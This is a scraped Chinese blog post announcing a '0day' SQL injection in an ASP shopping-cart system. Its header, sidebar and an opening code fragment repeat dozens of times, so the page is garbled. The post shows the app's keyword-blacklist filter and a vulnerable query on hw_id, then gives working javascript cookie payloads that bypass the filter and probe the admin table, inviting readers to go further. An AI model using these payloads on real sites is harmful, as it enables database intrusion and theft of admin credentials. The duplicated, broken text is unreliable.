Chinaunix首页 | 论坛 | 博客
  • 博客访问: 3227825
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227826
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227827
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227828
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227829
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227830
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227831
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227832
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227833
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227835
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227836
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227837
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227838
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227839
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227840
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227841
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227842
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227843
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227844
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227845
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227846
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227848
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227839
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227850
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227851
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227853
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227854
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227855
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227856
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227857
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227858
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227859
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227860
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227861
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227862
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227854
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227865
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227866
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227867
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227868
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227869
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227871
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227873
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227874
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227875
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227876
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227877
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227878
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227869
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227880
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227881
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%> 无忧购物系统oday发布-oma-ChinaUnix博客
  • 博客访问: 3227882
  • 博文数量: 181
  • 博客积分: 9990
  • 博客等级: 中将
  • 技术积分: 1865
  • 用 户 组: 普通用户
  • 注册时间: 2006-05-23 09:43
文章分类

全部博文(181)

文章存档

2011年(40)

2010年(17)

2009年(87)

2008年(37)

我的朋友

分类: 网络与安全

2009-07-14 22:34:34

其实代码中出现了多处SQLintection,但是在Conn.asp中:

  Set Conn = Nothing
Response.Write "数据库连接出错"
Response.End
End If
%>

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
  但问题不是很大的说~~ 先贴上一处吧,views.asp 部分代码如下:
<%hw_id=Request("hw_id")
sql="select * from hw where hw_id="&hw_id&""
rs.open sql,conn,3,3
if rs.eof then%>!
<%else
rs("hw_views")=rs("hw_views")+1
rs.update
可以看到,hw_id=Request("hw_id"),呵,如果管理员直接:
hw_id=Requet(Replace("hw_id","'",""))   或 hw_id=Requet(Replace("hw_id","'",""")) 下 或许我还难办点~~
(Ps:哎,自从国内推出了防注射代码后,程序员们都变懒了~~~)
  request集合中包含了cookie,所以 无论他的防注射代码多么的BT,咱们都可以忽略了:)
  测试代码如下:
 
清空后提交:javascript:alert(document.cookie="hw_id=" + escape("503 and 1=1"))
javascript:alert(document.cookie="hw_id=" + escape("503 and 1=2"))
直接判断出存在注入了
javascript:alert(document.cookie="hw_id=" + escape ("506 and (select count(admin_name) from admin)>0"))
OK,大伙自己发挥去吧~~
阅读(44592) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~

翻开了sqlcheck.asp,部分代码如下:
For Fy_x=0 to ubound(Fy_Cs)
If Fy_Cs(Fy_x)<>"" Then
If Instr(LCase(Request(Fy_Cs(Fy_x))),"'")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"and")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"select")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"update")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"chr")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"delete%20from")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),";")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"insert")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"mid")<>0 or Instr(LCase(Request(Fy_Cs(Fy_x))),"master.")<>0 Then
response.Write ""
Response.End

  过滤得还真不少~ '|and|select|update|mid|....等等等等   - -
